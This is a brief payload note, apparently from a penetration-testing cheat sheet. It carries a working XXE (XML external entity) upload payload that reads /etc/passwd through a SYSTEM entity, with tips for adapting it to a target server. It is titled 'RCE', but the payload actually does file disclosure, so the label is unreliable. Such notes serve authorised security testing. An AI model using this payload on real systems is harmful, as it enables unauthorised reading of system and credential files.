XML file upload RCE
?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<data>&file;</data>
- you might need to remove the # from ELEMENT
- you might need specific data sets that the web server requires.
Last modified 1yr ago